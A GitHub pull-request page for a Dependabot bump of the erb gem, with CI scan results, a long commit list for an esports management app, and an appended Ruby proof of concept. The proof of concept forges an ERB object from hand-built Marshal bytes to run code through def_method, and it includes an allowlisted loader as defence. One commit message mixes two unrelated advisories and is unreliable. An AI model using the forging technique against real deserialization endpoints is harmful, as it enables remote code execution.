chore(deps): bump erb from 6.0.2 to 6.0.4#31
Merged
Conversation
Bumps [erb](https://github.com/ruby/erb) from 6.0.2 to 6.0.4. - [Release notes](https://github.com/ruby/erb/releases) - [Changelog](https://github.com/ruby/erb/blob/master/NEWS.md) - [Commits](ruby/erb@v6.0.2...v6.0.4) --- updated-dependencies: - dependency-name: erb dependency-version: 6.0.4 dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com>
📦 Dependency Security Check: ✅ No known vulnerabilities found. (View Report)
Up to standards ✅ 🟢 Issues
🔒 Brakeman Security Scan: ✅ No high confidence issues found.
🔍 Semgrep Static Analysis
🔐 Security Scan Summary: Static Analysis (SAST), Dynamic Analysis (DAST). ✅ All security checks passed!
Bulletdev added a commit that referenced this pull request on May 8, 2026:
* fix: solve canvas drag issues
* feat: implement backfill job
* fix: solve risk assessment issue
* feat: implement allowed host for images
* feat: implement additional sec test suites
* chore: fix security lab workflow run
* chore: update security workflow run
* chore: update security workflow run
* chore: update database for workflow run
* docs: update readme and cookbooks
* fix: solve sidekiq organization permission issue
* chore: update ruby version for workflow run
* docs: auto-update architecture diagram [skip ci]
* fix: solve diagram workflow run setup
* chore: fix diagram workflow run
* fix: solve diagram router issues
* fix: solve diagram layer issues
* docs: update deployment section with diagram
* docs: update deployment setup and guideline
* fix: update k6 load tests run
* chore: update files reference
* fix: update docker build context
* fix: correct docker build contexts for Coolify
* fix: update docker location for tests
* Add FOSSA status badge to README
* feat: implement additional player stats
* feat(db): add additional feature labels
* feat: implement retry after throttle
* feat: implement codeql analysis
* feat: implement additional security tests
* fix: solve sarif workflow run
* fix: solve null bytes errors + backtrace
* fix: solve invalid statement rescue issue
* feat: implement additional test scenarios
* Fix repository URLs in CONTRIBUTING.md
  Updated GitHub repository URLs in contributing guidelines.
* fix: solve multi-tenant issue
* fix: solve scouting target player policy; fix scouting target and bulk sync issues
* feat: implement additional SQLI tests
* fix: solve semgrep false positive
* fix: solve semgrep inline suppress
* chore: Update Sidekiq descriptions in README.md
* feat: implement additional sec tests
* Delete .pentest/reports/security-audit-2026-03-18.md
* chore: update gitignore
* chore: update cookbooks
* chore: fix production build
* feat: add ai intelligence module
* fix: correct bugs found during test coverage expansion
* test: expand rspec coverage across all modules
* feat: implement internal messenger
* feat: implement mailer contact form
* fix: make mailer conditional
* fix: solve mail logger warning
* feat: implement feedback area
* chore: rubocop linter fix
* feat: implement ticket validation
* feat: implement ticket/support
* fix: solve register issues
* fix: solve regex sem
* chore: brakeman ignore adjust
* feat: implement hire from scouting
* fix: solve dependency issue
* feat(db): implement scrims and inhouse
* feat: implement scrims and inhouse
* fix: solve rails dependency issue
* feat: implement additional active storage test
* feat: implement inhouse
* feat: add scrims feature to production
* fix: solve zeitwerk scrims issues
* fix: solve lobby serializer issue
* chore: reduce code complexity and fix code style
* fix: solve shell issues
* fix: solve remaining linter issues
* chore: improve linter and code coverage
* chore: improve sec. test coverage
* fix: solve remaining linter issues
* fix: solve permission deny issue
* fix: solve nginx conflict
* fix: lobby 404, search indexing in sidekiq, nginx unprivileged
* feat: implement inhouse integration
* fix: solve RIOT ID string parsing
* feat: improve inhouse features
* chore: add custom inflection to zeitwerk
* fix: solve traefik issue into compose
* chore: adjust status page and safe list
* feat: implement realtime scrims chat
* feat: implement result report
* feat: implement scrims live chat popup
* feat: add logo upload for organizations
* feat: add devops management scripts
* fix: solve minor roster mismatches
* fix: adjust team logo serializer
* feat: implement feedback template
* feat: implement arenaBR free agents register
* fix: solve arenaBR CORS issues
* fix: adjust arenaBR CORS
* fix: solve codacy warnings
* feat: improve security lab test coverage
* fix: solve scrims public lobby display; fix lobby for https://scrims.lol
* chore: adjust dependencies
  fix: Rack::Session::Cookie incorrectly handles decryption failures when configured with secrets:. If cookie decryption fails, the implementation falls back to a default decoder instead of rejecting the cookie. This allows an unauthenticated attacker to supply a crafted session cookie that is accepted as valid session data without knowledge of any configured secret. This vulnerability affects Addressable >= 2.3.0 (note: 2.3.0 and 2.3.1 were yanked; the earliest installable release is 2.3.2). It was partially fixed in version 2.8.10 and fully remediated in 2.9.0. The vulnerability is more exploitable on MRI Ruby < 3.2 and on all versions of JRuby and TruffleRuby. MRI Ruby 3.2 and later ship with Onigmo 6.9, which introduces memoization that prevents catastrophic backtracking for the first class of template. JRuby and TruffleRuby do not implement equivalent memoization and remain vulnerable to all patterns
* feat: implement schedule audit
* feat: implement tournaments module
* docs: auto-update architecture diagram [skip ci]
* fix: solve snyk issue
* fix: solve hash id issue
* fix: remove unused dependencies
* fix: solve pro matches issue
* fix: solve tournament bracket issues
* feat: add team tag to organizations
* fix: solve nightly workflow run issue
* fix: solve bundler mismatch
* fix: solve tournament bracket rules
* fix: solve remaining nightly workflow issues
* chore: adjust bracket generator rule
  Change to the bracket generator. Technical reasons: 1. Sequential bracket management: the admin releases one round at a time, nothing in parallel 2. Less window for delays to accumulate 3. Teams know exactly when they will play (no "you may play Friday AND Saturday depending on the result") 4. The code supports both, but Model 2 is easier to operate in the MVP
* feat: improve connection pooling
* Remove duplicate badges in README.md
  Removed duplicate badges for Codacy and FOSSA.
* feat: implement database test
* feat: implement tier thresholds
* chore: bump version to ruby 3.4.9
* chore: bump version to ruby 3.4.8
* feat: implement target season history
* chore: Update database description
* feat: implement CircuitBreaker + cache layer
* docs: auto-update architecture diagram [skip ci]
* chore: adjust api call to load test scenario
* chore: use local database instead of serverless
* chore: adjust database connection
* fix: solve sidekiq major outage
* feat: implement go riot proxy
* fix: solve mismatch into sync matches
* fix: solve zeitwerk issue into import matches
* fix: solve heartbeat issue
* feat: add discord duplicated warning
* feat: implement gateway into api workflow
* fix: solve matches scope mismatch
* fix: solve internal schema issue
* fix: solve migrations issue
* fix: adjust schema idempotency
* chore: improve code style; fix minor codacy issues
* chore: adjust rack attack by ip address
* feat: implement mailing and templates
* chore: adjust license and cookbooks
* feat: implement pandascore
* chore: adjust gateway integration
* chore: improve build cache
* feat: implement aud into payload
  The gateway validates jwt.WithAudience("prostaff-riot-gateway") in the Go source; without the aud in the payload it always rejects with 401 regardless of whether the secret is correct
* feat: implement multi roster
* fix: solve migrations entrypoint
* fix: solve sidekiq healthcheck
* refactor: solve team comparison gaps
* fix: solve period issue into comparison
* fix: solve unscoped player issue
* fix: adjust player policy
* fix: solve org unscoped minor issue
  Uniqueness validations (player_email, riot_puuid, riot_summoner_id) also run without the scope, eliminating the 3x [SECURITY] false positives; CurrentAttributes is thread-safe and is reset automatically at the end of the request
* fix: solve database port mapping
* chore: improve match details
* fix: solve import to roster issue
  A private class method can only be called without a receiver
* fix: solve player import to roster issue
  The index shows global targets without excluding signed ones by default. After the import, the org's watchlist is destroyed and the status becomes signed, but the endpoint keeps returning the player
* refactor: extract MatchFilterQuery, cache invalidation, and security audit fixes
  - Extract match filters/sorting to MatchFilterQuery (app/queries/)
  - Add invalidate_cache helper to Cacheable concern
  - Add after_action cache invalidation on update/destroy in matches, players, tournaments controllers
  - Move paginate inside cache block in MatchesController to avoid unnecessary query on cache hit
  - Fix ScoutingPlayersController N+1: replace global includes with scoped org query after pagination
  - Standardize 6 analytics controllers with before_action :set_player
  - Decompose CompetitiveController#build_role_performance into 3 helpers, remove rubocop:disable
  - Move PERFORMANCE_ROLES constant before private section
  - Fix Semgrep nosemgrep placement in 3 email templates (password_reset x2, welcome)
  - Update README and PRD with 2026-04-21 security audit results (Brakeman 0, Semgrep 0, pentest 0 real findings)
* chore: improve api docs page
  Improve to have a readme.io look and feel
* fix: solve smtp issue and dead jobs
  1. Sidekiq healthcheck (sidekiq service, before the depends_on) 2. SMTP vars in both services (api and sidekiq)
* fix: solve scraper match index issue
* fix: solve healthcheck minor issue
* fix: solve semgrep issues
* feat: implement prostaff events phoenix/elixir - real-time Event Bus & WebSocket Hub
* fix: solve req and telemetry issues
* feat: implement pro match details
  Complete pre/post-game analysis panel
* docs: auto-update architecture diagram [skip ci]
* docs: improve readability
  Removed redundant architecture section and consolidated module information in README.
* docs: update architecture and dataflow
* fix: solve scouting waitlist issue
  ScoutingWatchlist already had belongs_to :organization; only the other side of the association on Organization was missing, causing a System Error: undefined method 'scouting_watchlists' for an instance of Organization
* docs: auto-update architecture diagram [skip ci]
* feat: implement observability
* docs: update changelog
* fix: solve filebeat issue
* fix: solve single-query in the vector builder.
* fix: solve exact match mismatch
* chore: adjust allowed host
* fix: solve sidekiq admin minor issue
* fix: sidekiq session issue
  Rack::Session::Cookie needs to come before the mount so that Sidekiq::Web has a session available when rendering the pages; without it the login gets through Basic Auth but CSRF blocks everything right afterwards
* fix: solve rack session issue
* chore: adjust sidekiq bypass
  The bypass is safe because /sidekiq is already protected by Rack::Auth::Basic and nobody reaches the assets without authenticating first. default-src 'none' is correct for the API's JSON endpoints, but makes no sense for a web UI
* fix: solve sidekiq allowed content
* fix: solve additional sidekiq csp
* fix: solve CSP mismatch for sidekiq
  Sidekiq already injects its own permissive CSP with a nonce; we only need to not overwrite it with the restrictive one
* fix: solve atomic conflict
* fix: solve setlocal mismatch and upsert
  SET LOCAL only applies inside an explicit transaction; outside one Postgres silently ignores it. SET without LOCAL changes the timeout for the whole connection (which returns to the pool after the job, but Sidekiq connections are dedicated, so the effect is the expected one)
* docs: update service links and add observability details
  Updated service links in the README to point to GitHub and added details for observability and monitoring.
* fix: solve pro matches card issues
* docs: Refactor architecture section in README
  Updated architecture section to use details summary format and removed redundant text.
* docs: enhance deployment architecture
  Added internal JWT connections for Router and Sidekiq.
* docs: revise competitive module details and formatting
  Updated competitive module references to include Grid.gg and improved formatting in the README.
* feat: implement ProStaff ML
  Currently in ProStaff I have my own trained AI model for recommendations of the kind "X is better than Y in this context":
  - XGBoost for binary classification (win/loss given the draft + context) on tabular data, trains fast on CPU
  - Matrix Factorization for implicit synergies (similar to what Netflix uses for recommendation), discovering latent relationships between champions that raw win rate does not capture
  - Champion embeddings trained on your own history (Word2Vec over pick sequences), an own vector representation richer than the current vectors based only on average stats
* docs: auto-update architecture diagram [skip ci]
* docs: update to insert ML service
* fix: solve map ML suggestions issue
* docs: add Scraper API and related components
  Added new components for the Scraper API and its associated daemons, including health checks and data enrichment processes.
* docs: Update enrichment descriptions
* docs: update README with Mermaid Live Editor link
* Update README.md
* fix: solve BackfillJob issue
* docs: auto-update architecture diagram [skip ci]
* feat: add competitive name into org
* chore(deps): bump erb from 6.0.2 to 6.0.4 (#31)
  Bumps [erb](https://github.com/ruby/erb) from 6.0.2 to 6.0.4. - [Release notes](https://github.com/ruby/erb/releases) - [Changelog](https://github.com/ruby/erb/blob/master/NEWS.md) - [Commits](ruby/erb@v6.0.2...v6.0.4) --- updated-dependencies: - dependency-name: erb dependency-version: 6.0.4 dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
* docs: Update service links in README.md
* docs: remove duplicated module architecture details
  Removed detailed module descriptions from the README.
* docs: Fix formatting of project entries
* feat: implement team chat
* docs: auto-update architecture diagram [skip ci]
* chore: add FK to avoid conflict
* fix: solve database mismatch
* fix: solve FK issue
* chore: adjust test scheme
* fix: solve team chat websocket issue
* fix: solve messaging channel
* docs: simplify architecture section
  Removed detailed module descriptions from the architecture section.
* fix: solve promatches pagination issue
* docs: auto-update architecture diagram [skip ci]
* docs: simplify architecture section
  Removed detailed module descriptions from the architecture section.
* fix: solve promatches search issue
* docs: auto-update architecture diagram [skip ci]
* fix: solve promatches search issue
* Refactor README to eliminate redundancy
  Removed duplicate architecture section and cleaned up module list.
* feat: implement draft simulator
* docs: auto-update architecture diagram [skip ci]
* fix: solve semgrep inline issues
* fix: solve semgrep deploy alert
* fix: solve Zeitwerk module nesting
* fix: solve array render into draft
* docs: Refactor architecture section in README.md
* fix: solve scrims lobby issue
* refactor: remove fantasy feature
* feat: implement monitoring sources
* feat: implement payment gateway
* fix: solve dependency issue
* fix: solve analytics dashboard issues
* fix: solve linter issues
* fix: solve stack trace audit
* fix: update hostname whitelist
* fix: solve dropdown override into docs
* feat: implement monitoring templates

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
Co-authored-by: Michael D. <michael.silva@plathanus.com.br>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps erb from 6.0.2 to 6.0.4.
Release notes: sourced from erb's releases.
Changelog: sourced from erb's changelog.
Commits:
- 4d2b45e Version 6.0.4
- 9d017be Prohibit def_method on marshal-loaded ERB instances
- 9c8fa8a Version 6.0.3
- 0ebc6ae Bump rubygems/release-gem from 1.1.2 to 1.2.0
- 25a729a Bump step-security/harden-runner from 2.15.0 to 2.16.1
- 9820802 Bump actions/create-github-app-token from 2 to 3
- 2611366 Bump lewagon/wait-on-check-action from 1.5.0 to 1.6.0
- 890d87f Use github.token instead of missing MATZBOT_DEPENDABOT_MERGE_TOKEN secret
- afc32b6 Fix dependabot auto-merge by using GH_TOKEN env var
- 2fd0a6b fix: exclude some files from published gem (#108)
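The one security-relevant change in this bump is the commit "Prohibit def_method on marshal-loaded ERB instances". The example below is added here; it is not code from the erb gem, from this PR or from the project. It shows what that commit is guarding against: an ERB object stores its compiled template as Ruby source in @src, and ERB#def_method compiles that source into a method body. Anyone who can feed bytes to Marshal.load can forge an ERB instance from raw bytes (ERB#initialize never runs) with an @src of their choosing. ERB#result already refuses such an instance because it checks the @_init marker that ERB#initialize sets; def_method is the path this bump closes. The attacker source, the hand-rolled Marshal encoder, the ALLOWED_CLASSES allowlist and the safe_load/unsafe_load helpers are all constructed for this example; what the installed erb does when def_method is called on the forged instance is read back at run time rather than assumed.

```ruby
require 'erb'

# Constructed attacker input for this example (not from the PR). The code only
# sets a global marker so the demo is harmless; a real payload could do anything.
ATTACKER_SRC = "$erb_demo_marker = :attacker_code_ran; ''"

# Hand-rolled Marshal encoder for one 'o' (plain object) record whose instance
# variables are UTF-8 strings: enough to forge an ERB instance from raw bytes,
# exactly as a deserialization attacker does. ERB.new is never called.
def marshal_len(n)
  raise ArgumentError, 'demo encoder handles lengths 0..255 only' unless (0..255).cover?(n)
  return "\x00".b if n.zero?
  n < 123 ? (n + 5).chr.b : "\x01".b + n.chr.b
end

def marshal_symbol(name)
  ':'.b + marshal_len(name.bytesize) + name.b
end

def marshal_utf8_string(str)
  # I"<len><bytes><1 ivar>:E T  => a String tagged with encoding UTF-8
  'I"'.b + marshal_len(str.bytesize) + str.b + marshal_len(1) + marshal_symbol('E') + 'T'.b
end

def forged_erb_payload(src)
  # "\x04\x08" is the Marshal format version, then o:<class name><ivar count><ivars>
  "\x04\x08".b + 'o'.b + marshal_symbol('ERB') + marshal_len(1) +
    marshal_symbol('@src') + marshal_utf8_string(src)
end

# Plain Marshal.load hands back a live ERB whose compiled template source
# (@src) is whatever the attacker wrote; ERB#initialize never ran.
def unsafe_load(payload)
  Marshal.load(payload)
end

# ERB#result checks the @_init marker that ERB#initialize sets and raises
# ArgumentError ("not initialized") on a forged instance, so this returns the
# error class rather than the attacker's marker.
def render_forged(payload)
  $erb_demo_marker = nil
  unsafe_load(payload).result(binding)
  $erb_demo_marker
rescue StandardError, SecurityError => e
  e.class
end

# ERB#def_method turns @src into a method body. On an erb without the fix in
# this bump, calling that method runs the attacker's code and this returns
# :attacker_code_ran; on an erb that prohibits def_method on marshal-loaded
# instances, the error class it raises comes back instead.
def define_from_forged(payload)
  $erb_demo_marker = nil
  mod = Module.new
  unsafe_load(payload).def_method(mod, 'forged_render')
  Object.new.extend(mod).forged_render
  $erb_demo_marker
rescue StandardError, SecurityError => e
  e.class
end

# Allowlisted loader (example hardening, not part of erb or the project):
# Marshal.load's proc callback sees every object as it is materialised, and
# anything outside the allowlist aborts the load before a forged ERB reaches
# application code.
ALLOWED_CLASSES = [String, Integer, Float, Symbol, Array, Hash,
                   TrueClass, FalseClass, NilClass].freeze

def safe_load(payload)
  Marshal.load(payload, lambda { |obj|
    unless ALLOWED_CLASSES.any? { |klass| obj.is_a?(klass) }
      raise SecurityError, "refusing to deserialize #{obj.class}"
    end
    obj
  })
end

def safe_load_rejects?(payload)
  safe_load(payload)
  false
rescue SecurityError
  true
end

if __FILE__ == $PROGRAM_NAME
  payload = forged_erb_payload(ATTACKER_SRC)
  puts "forged object class:       #{unsafe_load(payload).class}"
  puts "forged @src:               #{unsafe_load(payload).src.inspect}"
  puts "ERB#result on forged:      #{render_forged(payload).inspect}"
  puts "ERB#def_method on forged:  #{define_from_forged(payload).inspect}"
  puts "allowlisted load rejects:  #{safe_load_rejects?(payload)}"
end
```

Run it against the erb version bundled before and after this bump to see define_from_forged flip from the attacker's marker to an error class; the forged payload, ERB#result and the allowlisted loader behave the same either way. The allowlist is the control to keep regardless of the gem version: any class that can be materialised from attacker bytes, ERB included, should never reach Marshal.load in the first place.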